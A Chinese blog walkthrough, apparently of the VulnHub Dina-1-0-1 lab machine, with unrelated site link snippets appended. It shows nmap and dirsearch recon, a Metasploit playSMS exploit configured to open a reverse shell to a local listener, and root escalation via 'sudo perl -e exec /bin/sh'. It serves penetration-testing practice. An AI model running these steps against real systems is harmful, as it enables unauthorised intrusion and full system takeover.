Dina-1-0-1

最新推荐文章于 2024-08-03 07:21:58 发布
最新推荐文章于 2024-08-03 07:21:58 发布
阅读量177 收藏 2
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/140859342
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.155 -p- -A

3、目录扫描

dirsearch -u http://192.168.236.155

二、GetShell

步骤一:访问 80 端口,拼接 /robots.txt 文件,查看信息

步骤二:拼接 /secure 目录,发现备份文件,下载,解压需要密码

步骤三:拼接 /nothing,查看源代码,发现密码信息

步骤四:尝试用这些密码解压备份文件,密码为 freedom,解压后为视频文件,已损坏,使用记事本打开,发现用户名及URL

步骤五:拼接url,发现登录页面,使用之前的账号和密码尝试登录,touhid/diana

步骤六:playSMS框架存在nday,可利用nday GetShell,需要使用 msfconsole

search playSMS

步骤七:使用序号2,查看详细信息,配置标明yes的信息

use 2
show options

set targeturi /SecreTSMSgatwayLogin #配置上传文件页面的url
 
set password diana                  #配置密码
        
set username touhid                 #配置账户
        
set rhosts 192.168.236.155          #靶机ip
        
set lhost 192.168.236.137	          #kali监听机的ip
        
set LPORT 6666                      #kali监听的端口

run

三、提权

步骤一:获取交互式shell,查看具有 sudo 权限的命令

shell python -c 'import pty; pty.spawn("/bin/bash")'

步骤二:执行以下命令,成功提权

sudo perl -e 'exec "/bin/sh";'

花椒椒椒
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 825
该靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
Dina-1-0-1靶机
weixin_71232352的博客
08-01 260
Dina-1-0-1靶机
靶机【B2R】Dina-1-0-1
干铮的博客
09-27 441
【B2R】Dina-1-0-1 1.信息收集 根据靶机MAC地址获取IP。 Nmap -sP 192.168.43.0/24 Nmap 192.168.43.91 -A -p- -oN nmap.A 2.网页信息收集 访问站点 御剑扫描敏感目录 敏感目录 http://192.168.43.91/nothing/ 后台备份文件 解压文件尝试使用之前留给的密码 freedom 使用文本打开文件 访问http://192.168.43.
Dina-1-0-1靶机复现
weixin_52956666的博客
08-02 292
解压发现需要密码,使用刚才nothing源码中的password字段尝试。set rhosts 192.168.7.140 Dina的IP。发现为后台为playsms,尝试使用msf进行getshell。密码继续用nothing中的password字段尝试。点击页面网址,没有发现什么有信息的地方。账户名应该就是刚才的touhid。尝试成功,密码为freedom。发现diana为该账号的密码。80端口开放,进行目录扫描。发现了password字段。发现存在账户名touhid。sudo -l查看免密操作。
Dina-1-0-1靶机渗透测试
weixin_58786230的博客
08-01 207
发现只开放了80端口。
Vulhub靶场之Dina-1.0.1
weixin_45650977的博客
04-30 848
Vulhub靶场之Dina-1.0.1 靶机描述 环境准备 vmware15 打开 攻击机:kali NAT模式 靶机:Dina1.0.1 NAT模式
Dina-1-0-1靶机(乔布斯看了都说好)
zdd1453691081的博客
08-01 223
发现只开放了80端口。
Dina-1-0-1打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-01 610
Dina-1-0-1打靶渗透【附代码】(权限提升)
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
02-05
6008080 g Z 1 dina0 Z-ZEICHNUNG.tif
认知诊断DINA模型研究进展_张潇1
08-04
Q矩阵的元素为0或1,表示正确回答某个问题所需具备的认知属性。 【Q矩阵】Q矩阵是DINA模型的核心组成部分,它是一个J乘K的二进制矩阵,其中J代表测试题目数量,K代表认知属性的数量。Q矩阵的每一行对应一个测试题目...
工商银行U盾 12864液晶 弄个小玩意 有兴趣的可以看看-电路方案
04-22
- "Fsq97qesTd0hYa3VB4Be3Dina7M2.png" 可能是液晶屏的详细电路图,用于理解引线定义和连接方式。 - "程序.rar" 可能包含驱动液晶屏的源代码或固件,用于控制液晶屏显示内容。 - "制作.zip" 和 "资料.zip" 可能包含...
generate你会用吗?
08-05
reg [DELAY_TAP20-1:0] dina_buf; reg [DELAY_TAP25-1:0] dinb_buf; // 使用generate语句实现延迟 generate genvar i; for (i = 0; i ; i++) begin always @(posedge sys_clk or negedge rst_n) begin if (rst_...
Kotlin 基础教程之数组容器
08-30
val customers: java.util.HashMap, Customer> = hashMapOf(1 to Customer("Dina", "Kreps", 1), 2 to Customer("Andy", "Smith", 2)) val linkedHashMap: java.util.LinkedHashMap, String> = linkedMapOf("red" to...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1741
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 446
设备安全
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
最新发布
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值